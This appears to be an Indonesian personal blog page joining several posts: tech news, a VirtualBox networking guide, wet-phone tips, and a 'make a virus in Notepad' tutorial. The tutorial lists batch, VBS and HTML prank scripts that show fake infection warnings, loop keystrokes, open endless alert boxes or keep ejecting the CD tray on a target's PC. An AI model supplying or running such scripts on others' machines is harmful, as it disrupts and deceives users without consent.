"Menatap ke depan dan dengan kepemimpinan yang kuat di jajaran atas. Frank sangat menginspirasi dalam kepemimpinannya," salah satu alasan karyawan menyukai Frank.

2. Bill McDermott & Jim Hagemann Snabe - SAP

Jim Hagemann Snabe ditunjuk menjadi co CEO SAP menemani Bill pada Februari 2010. Sebanyak 99% pegawai menyukai duet kepemimpinan ini.

SAP sendiri adalah perusahaan yang bergerak di sektor software untuk kalangan enterprise. Terutama untuk mengendalikan operasional bisnis perusahaan.

"Kompensasi yang bagus dan kedua CEO ini memang fenomenal," salah satu alasan karyawan menyukai kedua CEO mereka.

1. Mark Zuckerberg - Facebook

Boleh jadi Zuckerberg adalah yang paling muda usianya dalam daftar ini. Namun dia masuk posisi teratas dengan tingkat persetujuan karyawan mencapai 99%.

Selaku pendirinya, Zuckerberg memang sangat fokus mengembangkan Facebook hingga masuk bursa saham tahun lalu. Dia juga sukses mempertahankan posisi Facebook sebagai jejaring sosial terpopuler dunia hingga saat ini.

"Zuck membangun komunitas terbuka antara para karyawan Facebook. Itu semua ditanamkan oleh CEO yang sangat kami hormati," salah satu alasan karyawan menyukai Zuckerberg.

Sumber Article : Open

Cara Agar Virtual Box Dapat Terhubung Dengan PC Kita Sendiri

zky-esemka  >>  pada kesempatan ini saya akan memberikan cara men-konfigurasikan virtual box agar dapat terhubung dengan PC kita sendiri sehingga kita mendapat kan jaringan internet dari PC kita
 

1. Buka virtual box, pilih Ubuntu Server, (disini saya pakai Ubuntu Server)

   












2. Lalu klik kanan pada ubuntu server klik setting, 



   

3. Setelah itu pilih network







4. Setelah itu ganti "Attached to" pada adapter 1 dari NAT menjadi Bridge Adapter






5. Lalu Enable-kan adapter 2 nya

6. Setelah itu ganti "Attached to" pada adapter 2 dari Not Attached menjadi Bridge Adapter






7. Setelah selesai tekan OK, selesaaiii :D

NB: cara ini berlaku apabila anda sudah mengatur IP Address dan DNS dari OS yang anda masukkan ke dalam virtual box

Silaah kan mencobaa, bila anda kurang mengerti silahkan comment di bawah ini, Saya Harap Postingan Kali ini Jangan Di COPY PASTE karena susah bikin nya :^^

Account Twitter Anonymouse Di Serang Hacker Lain

zky-esemka >> Apa jadinya kalau seorang hacker diserang hacker lain? Nah, fenomena inilah yang barusan terjadi, di mana akun Twitter milik kelompok hacker ternama dunia, Anonymouse diserang oleh kelompok hacker lain.

Adalah sekelompok hacker bernama Rustle League yang melakukan serangan tersebut. Dalam melakukan aksinya tersebut, Rustle League memilih akun utama dari Anonymous, yakni @Anon_Central sebagai target utamanya. Akun ini saat ini mempunyai jumlah follower yang mencapai 160 ribu akun.

Pengambil alihan akun Twitter Anonymous ini pun tidak terlalu lama. Pada saat berita ini ditulis, pihak Anonymous telah berhasil memulihkan serangan tersebut.

Serangan ini menandai reteten serangan hacker yang sebelumnya telah terjadi. Beberapa di antaranya adalah akun Twitter dari Burger King, Jeep serta salah satu presenter terkenal dari BBC, yakni Jeremy Clarkson.

Sumber Article : Open

Cara Mengatasi HP Yang Masuk Kedalam Air

zky-esemka >>Seiring populernya penggunaan gadget, orang kerap membawa berbagai perangkat digital ke mana saja. Kita bisa menikmati video YouTube saat berada di kendaraan umum, membalas email pekerjaan di kafe, termasuk menggunakan ponsel ketika melakukan 'rutinitas' di dalam kamar mandi.



Kebiasaan ini bukan tanpa risiko. Salah satu akibat paling parah yang mungkin dialami oleh Anda, jatuhnya smartphone kesayangan ke dalam kloset. Jika ini menimpa Anda, jangan panik. Berikut beberapa cara menyelamatkan gadget tersebut.

1. Langsung segera ambil ponsel dan jika ponsel tersebut sudah dalam keadaan mati jangan langsung   dinyalakan. Bersihkan dan keringkan layar dan seluruh badan ponsel yang basah.

2. Jika ponsel tersebut adalah iPhone, jangan mengeluarkan baterainya dari dalam ponsel karena dapat menghilangkan garansi Anda. Sebaiknya, masukkan iPhone ke dalam plastik berisi beras, lalu diletakkan di tempat yang hangat, tunggu hingga 24 jam.

Jika masih belum menyala, jangan panik. Dari pengalaman beberapa pengguna iPhone, mereka mendiamkan lebih dari beberapa hari sampai bisa digunakan lagi.

Bagi pengguna Android atau Windows, lakukan hal yang sama seperti pada tahap satu dan dua. Namun jika baterai iPhone masih di dalam ponsel, keluarkan baterai dikeluarkan. Casing bagian belakang dilepaskan, lalu masukkan ke dalam plastik yang berisi beras. 

Sumber Article : Open

Cara Membuat Virus Ganas & Unik Di Notepad

zky-esemka >> Kali ini saya akan mengajarkan bagaimana cara membuat virus simple melalui notepad, 

cara nya sangat mudah, kita hanya mengcopy script di bawah ini kedalam notepad, dengan ektensi yang telah ditentukan, INGAT postingan ini saya buat hanya untuk pembelajaran, jangan di salah gunakan, 

baiklah langsung saja kita praktekkan, :

1.   Pesan Restart ( save dalam ektensi .BAT ) 

     @ ECHO off

     :Begin

     msg * WARNING !

     msg * Komputer Lo Error

     msg * Cuma satu cara agar sembuh

     msg * Harus di install ulang nih

     GOTO BEGINng kKo

2.   Pesan Shutdown  ( save dalam ektensi .BAT )

     @echo off

     msg * Komputer lo kena virus nih

     msg * Uda ga bisa idup lagi

     msg * Harus di install ulang nih

3.   Tombol Caps Lock kedip-kedip terus  ( save dalam ektensi .VBS ) 

     Set wshShell =wscript.CreateObject("WScript.Shell") do

     wscript.sleep 100

     wshshell.sendkeys "{CAPSLOCK}" loop

4.   Terkena Virus ( save dalam ektensi .HTML )

     <html>

     <head>

     <script type

     ="text/javascript">

     function display_alert()

     {

     alert("Komputer telah terinfeksi virus berbahaya!!")

     var b = true

     while (b == true){

     alert("Virus Zky-CyberCrime !!")

     }}

     script>

     head>

     <body><input type="button" onclick="display_alert()"

     value="Submit" />body>

     html>center>

5.   Menekan Enter Terus Menerus  ( save dalam ektensi .VBS ) 

     Set wshShell = wscript.CreateObject("WScript.Shell")

     do

     wscript.sleep 100

     wshshell.sendkeys "~(enter)"

     loop

6.   Memunculkan Pesan Secara otomatis ( save dalam ektensi .VBS )

     WScript.Sleep 180000

     WScript.Sleep 10000

     Set WshShell = WScript.CreateObject("WScript.Shell")

     WshShell.Run "notepad"

     WScript.Sleep 100

     WshShell.AppActivate "Notepad"

     WScript.Sleep 500

     WshShell.SendKeys "Hello"

     WScript.Sleep 500

     WshShell.SendKeys "gimana"

     WScript.Sleep 500

     WshShell.SendKeys "kabar"

     WScript.Sleep 500

     WshShell.SendKeys "Loe"

     WScript.Sleep 500

     WshShell.SendKeys " ? "

     WScript.Sleep 500

     WshShell.SendKeys "baek2"

     WScript.Sleep 500

     WshShell.SendKeys "aja"

     WScript.Sleep 500

     WshShell.SendKeys "kan"

     WScript.Sleep 500

     WshShell.SendKeys "????"

7.   Backspace Jalan Terus-Menerus  ( save dalam ektensi .VBS ) 

     Quote:

     MsgBox "Let's go back a few steps"

     Set wshShell =wscript.CreateObject("WScript.Shell")

     do

     wscript.sleep 100

     wshshell.sendkeys "{bs}"

     loop

     

8.   Taget Harus Mengetik "Aku sayang kamu" Secara Terus-Menerus  ( save dalam ektensi .VBS )

     Quote:

     Set wshShell = wscript.CreateObject("WScript.Shell")

     do

     wscript.sleep 100

     wshshell.sendkeys "Aku sayang kamu"

     loop       

9. Membuka dan menutup CD/ DVD ( save dalam ektensi .VBS )

Set oWMP =CreateObject (“WMPlayer.OCX.7″) Set colCDROMs    =oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop 

sekian dulu script yang zky-esemka berikan, sebenarnya masih banyak lagi, tapi karna waktu yang mepet jadi saya hanya dapat memposting itu saja, SELAMAT MENCOBA :D